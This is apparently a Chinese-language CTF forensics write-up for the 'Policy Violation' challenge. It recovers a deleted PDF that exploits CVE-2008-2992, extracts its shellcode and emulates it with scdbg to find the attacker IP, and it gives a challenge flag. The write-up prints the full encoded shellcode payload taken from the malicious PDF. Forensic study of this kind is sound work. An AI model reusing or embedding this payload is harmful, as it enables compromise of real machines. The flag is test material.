Policy Violation Pt.1 142 One of our employees violate the company
policy by running a malicious document on the company machine after we
noticed that he deleted the files can you bring it back to make some
analysis?Q1. What is the CVE Number and Date of exploit? Example:
crew{CVE-XXXX-XXXX_Date:MM.D.YY} Policy Violation Pt.2 648 One of our
employees violated the company policy by running a malicious document
on the company machine after we noticed that he deleted the files can
you bring it back to make some analysis?Q2. What is the sha1sum of the attacker IP ?
Example: crew{SHA-1(IP)}
crew{ea424d38af72dd1366a08aad1f47eca3e7ec3d24}
下载地址:https://pan.baidu.com/s/1XOosHWU6GiXUX7bp6h0WnQ?pwd=mzy0
题目大概意思是让去寻找以下两个点
1.进行exploit的CVE编号
2.寻找攻击者ip
E01用FTK挂载,很容易可以在回收站目录下发现许多文件
文件名为:$RD5UESN.pdf的比较可疑,进行导出
习惯性的丢到各个在线分析平台进行分析
virustotal得到结果
得到CVE编号CVE-2008-2992
参考文章 https://www.cnblogs.com/SunsetR/p/11270981.html
使用PDF Stream Dumper提取出shellcode
以下部分为shellcode
%u91f5%u4297%u412f%u3f98%u4b98%u4342%u9197%u999f%u4092%u4046%u9140%u964e%u9691%u4940%ufd98%u4348%uf537%u4891%u4ad6%ufd3f%ufcf9%u3ff9%u48fc%u4299%u9198%u4392%ud643%u2796%u9b37%uf842%u4afd%ud69f%u274f%u4790%u9797%uf999%u4ff8%ufc48%u3f9f%u9bf8%u92f9%u9847%u4e40%uf54f%u3796%u9096%u9b47%u4343%uf599%u4b97%u9243%u4f47%u4648%u484a%u4f4a%u4993%u97f5%u4f46%u2f9b%u474e%uf590%u96f9%u37d6%u4b98%u9298%ud693%u9f96%u4948%uf542%u97f9%u9190%u9347%u46f5%u9798%ud690%ufc2f%u4737%ufc4a%u9647%u9f91%u3ff8%uf590%u46d6%u2ffc%u4741%u9093%ufd97%u4192%ufc46%u2f48%ufc9b%u279b%u3f4a%u4092%u474a%u37f5%u4690%u99d6%u9b9f%uf597%ufc42%u923f%u479b%u2791%u4e47%u9847%uf993%uf549%u9242%uf849%ufc99%uf596%u9bfd%u413f%u4e4f%uf549%u4348%u4f4e%u422f%ud6f8%u4847%ud627%u919b%ud64a%uf5d6%u9927%u4942%u9241%ufdf8%u9190%u92f5%u4096%ud63f%uf9f8%u9296%ufc92%u434f%u99f5%u9146%u904a%u9f46%u9692%u9143%u49d6%u983f%ud646%u99f5%u3f99%u4146%u494f%u98f9%u93f8%u4949%u9646%uf5fd%u9299%u484b%u4349%u4996%u4f4b%u92f9%uf83f%u3f93%u4f97%ufd4f%u27fd%ufd46%u979f%u493f%uf898%u989b%u9890%u4840%u9f27%u9947%u9f4e%u3798%u4f96%u3f3f%u9b43%u4a92%uf537%u274f%u4399%uf94f%u4298%u9846%u272f%u3f4e%uf83f%u48f5%u4e37%ud693%u484b%u9b92%uf592%u4246%u4b49%u4f49%u9746%u484b%u4f97%u9891%u9991%u3740%u47d6%ufc4e%u489f%u4827%ud642%uf541%ufd91%u4642%u4b93%u42f5%u4e42%u434f%u4bfd%u484f%u4a4b%u4efc%u473f%u99d6%u379f%ud62f%u9b93%u2742%u9f46%u2f9f%u47fc%u4290%u9347%u993f%uf542%u279b%u9b9b%u4647%u9899%uf542%u3f91%u274b%uf997%u92fc%u4837%u4e48%u962f%ufc92%u4e4e%u4f96%u4098%uf84b%ufdfc%u273f%ud642%u9837%u4efc%ud696%u3ff5%u92f8%u4a3f%u46d6%u4198%u2f46%u97f5%u98f5%u9296%u27f9%uf590%u49f5%u483f%u91f5%u9f47%ufdf8%u4637%u9fd6%u374e%u4292%u989b%u483f%u4e96%u9693%u9190%u4049%u92f5%u9b42%u4692%u9b97%u434b%u9142%u9f93%uf94b%u9090%u4ed6%u3793%uf8f5%u41f5%u27fd%u4248%uf5f8%u9293%u4f9b%u4842%u9b92%u464a%u4047%uf843%u46f8%u9796%u42fd%u27f9%u4b4e%u4a92%u3743%u9043%u4a37%u9146%u9b96%u4398%u9896%u9043%u4799%ud947%ubfd0%u9478%u642d%u74d9%uf424%u315e%ub1c9%u3159%u197e%u7e03%u8319%ufcee%u619a%u8cd1%u8ad5%u4d2a%ubb89%u29f8%ueec2%u3acc%u0286%ud8a4%u49ad%ua9a2%u45c3%u52fb%u212c%u8ab1%u8d03%uefea%u7102%u23f1%u48e4%u363a%u8de5%u3c8c%u430a%u3458%u7486%u08ed%u741a%u0721%u0e22%ud844%ua2d6%u0947%u639d%uf968%udb2a%uf870%u59ff%u8e49%u28c3%u5bc1%uaab0%u9203%u9d39%u146b%ud30a%u96c7%ud453%uecf7%u26af%uf685%u5474%u7251%ufe6a%u2412%ufe4e%ub3f7%u0c05%ub0b3%u1141%u1442%u2dfa%u9bcf%ua42c%ubf8b%uece8%ua148%u48a9%ude3e%u35a9%u7a9f%ud4a2%ufbf6%u274b%ua1f7%uebdb%u5a3a%u641b%u294c%u2b29%ua5e6%ua401%u3120%ua210%uedd2%ua39a%u0e2c%ueada%u5aea%u848a%ue2db%u5541%u36e3%u5fff%u7973%u5e57%u119d%u61a5%u86b0%u8720%u18e2%u1862%uc943%uc8c2%u032b%u37cd%u2c4b%u5004%uc3e6%u08f0%u7a9f%uc259%u823e%uae74%u0801%u4e7c%uf9cf%u5cf5%u9e38%u9cf5%u0bb9%uf6f5%u9dbd%u6ea2%uf8bc%u3084%u2f3f%u3797%uaebf%u4ca1%u24f6%u3a8d%ua8f7%ubb0d%ua2a1%ud30d%u9715%uc65e%u0259%u5bf3%uadcc%u08a5%uc647%u764b%u49af%u5db4%u8eb3%u234a%u369c%udb22%uc69c%ub1b2%u971c%u4eda%u1832%uae2a%u7199%u2522%u334c%u3ad3%u9545%u3a4d%u0e6a%u417e%ub103%ub67f%ud60d%ub680%ue831%u60bd%u9e08%ub080%u912f%u95b7%u3806%u8ab7%u6959
保存之后使用scdbg进行测试执行
IP为 192.168.1.30